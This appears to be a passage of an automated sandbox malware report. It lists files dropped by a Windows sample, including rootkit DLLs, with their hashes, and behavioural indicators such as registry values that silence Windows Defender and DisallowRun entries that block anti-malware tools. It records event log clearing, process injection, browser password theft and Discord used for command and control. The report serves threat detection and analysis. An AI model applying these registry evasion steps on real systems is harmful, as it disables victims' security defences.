memory/432-148-0x0000000000DC0000-0x0000000000DEA000-memory.dmp

memory/480-127-0x00000000375F0000-0x0000000037600000-memory.dmp

memory/480-126-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp

memory/480-117-0x00000000000C0000-0x00000000000EA000-memory.dmp

memory/432-113-0x0000000000BB0000-0x0000000000BD3000-memory.dmp

memory/432-111-0x0000000000BB0000-0x0000000000BD3000-memory.dmp

memory/1740-105-0x0000000140000000-0x0000000140040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\config

MD5 1ba367d0f9aac0f650e65ab7401776c0
SHA1 75cf3295125cfaa0c247ebccc57e63f915198683
SHA256 68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03
SHA512 45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c

memory/1100-322-0x00000000009E0000-0x00000000009EC000-memory.dmp

memory/1100-321-0x0000000000B70000-0x0000000000BA0000-memory.dmp

memory/1100-337-0x000000001BB00000-0x000000001BBA2000-memory.dmp

memory/1100-336-0x0000000002570000-0x00000000025A2000-memory.dmp

memory/1100-335-0x0000000000BA0000-0x0000000000BBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.vbs

MD5 ca906422a558f4bc9e471709f62ec1a9
SHA1 e3da070007fdeae52779964df6f71fcb697ffb06
SHA256 abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512 661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 808099bfbd62ec04f0ed44959bbc6160
SHA1 f4b6853d958c2c4416f6e4a5be8a11d86f64c023
SHA256 f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8
SHA512 e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

MD5 053778713819beab3df309df472787cd
SHA1 99c7b5827df89b4fafc2b565abed97c58a3c65b8
SHA256 f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA512 35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 eb51755b637423154d1341c6ee505f50
SHA1 d71d27e283b26e75e58c0d02f91d91a2e914c959
SHA256 db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9
SHA512 e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

MD5 a776e68f497c996788b406a3dc5089eb
SHA1 45bf5e512752389fe71f20b64aa344f6ca0cad50
SHA256 071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1
SHA512 02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

memory/2160-485-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\splwow64.exe

MD5 0d8360781e488e250587a17fbefa646c
SHA1 29bc9b438efd70defa8fc45a6f8ee524143f6d04
SHA256 ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64
SHA512 940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

memory/1816-494-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hh.exe

MD5 4d4c98eca32b14aeb074db34cd0881e4
SHA1 92f213d609bba05d41d6941652a88c44936663a4
SHA256 4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f
SHA512 959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

memory/1816-515-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 91128da441ad667b8c54ebeadeca7525
SHA1 24b5c77fb68db64cba27c338e4373a455111a8cc
SHA256 50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873
SHA512 bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

C:\Users\Admin\AppData\Local\Temp\xwizard.exe

MD5 df991217f1cfadd9acfa56f878da5ee7
SHA1 0b03b34cfb2985a840db279778ca828e69813116
SHA256 deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112
SHA512 175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

C:\Users\Admin\AppData\Local\Temp\xwizard.cfg

MD5 ae8eed5a6b1470aec0e7fece8b0669ef
SHA1 ca0e896f90c38f3a8bc679ea14c808726d8ef730
SHA256 3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e
SHA512 e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

C:\Users\Admin\AppData\Local\Temp\bhv3543.tmp

MD5 a98ccb9cf12f4f6c47cd74863792eb49
SHA1 b74ca8f18dec991881793b6e8132224c8e17b1e3
SHA256 43afcd74be45afd69d8c56de052e8d3364fc0ce0aec7d3acc8111b86e9744ffb
SHA512 c1ea9924a90342c0b9eb3c384dfcdcefdbb1c173289a5a860f23cf86e5c25995a993914507b61e914493518ba484368dfa589d30ed69902bb69ca96718a1caba

C:\Users\Admin\AppData\Local\Temp\whysosad

MD5 fc3c88c2080884d6c995d48e172fbc4f
SHA1 cb1dcc479ad2533f390786b0480f66296b847ad3
SHA256 1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664
SHA512 4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x86.dll

MD5 ecfb232ae47a07667a5850104ebebe26
SHA1 53db1507d46209797cad3d4029964cdfea708d8e
SHA256 6bc8e296f6935f5688234c3810f0326faebd898688688dfe3d5475e19cc5a83a
SHA512 6cd882dd1d11ee348ab4c287bc885af780e9fc79c7028d6f682c16bdda08888d67d98ab463e53e7243efe90ced9214d0aedfc460826082b09745b4a470cb0dbf

C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x64.dll

MD5 f876b8ce91d572547ea79104f3f24f48
SHA1 a154133be4547d099f4aefb9a5abbd55b02649be
SHA256 c1b0a94a72e64e31c5912101b759fd72d24785fd54e5e1433ebc43697f087d2c
SHA512 f3cafef52883788a12002458e382323f256b380bceacde67c919de5eb38a618db10e3cf53354787c8eddef1e1b29a1d3f97648deb1840bae5ac54af95343bcee

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-07 10:38

Reported

2024-10-07 10:41

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

150s

Command Line

winlogon.exe

Signatures

Modifies Windows Defender notification settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Windows\system32\reg.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2728 created 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 1252 created 612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "rkill32.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "mbar.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MRT.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "rkill64.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "mbam.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "rkill.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "MBSetup.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\$77main1.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api64.ipify.org N/A N/A
N/A api64.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\Recovery C:\Windows\system32\ReAgentc.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2728 set thread context of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1252 set thread context of 4764 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\SysWOW64\dllhost.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\ReAgentc.exe N/A
File created C:\Windows\Tasks\$77svc32.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc32.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File created C:\Windows\Tasks\$77svc64.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc64.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\ReAgentc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\$77Redownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\winhlp32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\xwizard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\$77main1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\splwow64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
